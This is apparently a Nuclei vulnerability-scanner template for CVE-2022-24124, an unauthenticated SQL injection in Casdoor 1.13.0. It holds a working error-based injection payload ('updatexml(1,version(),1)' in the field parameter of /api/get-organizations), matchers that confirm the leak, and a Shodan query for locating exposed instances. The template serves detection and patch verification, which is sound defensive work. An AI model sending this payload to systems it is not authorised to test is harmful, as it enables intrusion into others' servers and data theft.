nuclei-templates/cves/2022/CVE-2022-24124.yaml

42 lines
1.3 KiB
YAML

id: CVE-2022-24124
info:
name: Casdoor 1.13.0 - Unauthenticated SQL Injection
author: cckuailong
severity: high
description: Casdoor version 1.13.0 suffers from a remote unauthenticated SQL injection vulnerability via the query API in Casdoor before 1.13.1 related to the field and value parameters, as demonstrated by api/get-organizations.
reference:
- https://packetstormsecurity.com/files/166163/Casdoor-1.13.0-SQL-Injection.html
- https://www.exploit-db.com/exploits/50792
- https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-24124/vultarget
- https://nvd.nist.gov/vuln/detail/CVE-2022-24124
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-24124
cwe-id: CWE-89
metadata:
product: https://casdoor.org/
shodan-query: http.title:"Casdoor"
tags: cve,cve2022,casdoor,sqli,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "XPATH syntax error.*&#39"
- "casdoor"
condition: and
- type: status
status:
- 200
# Enhanced by mp on 2022/03/08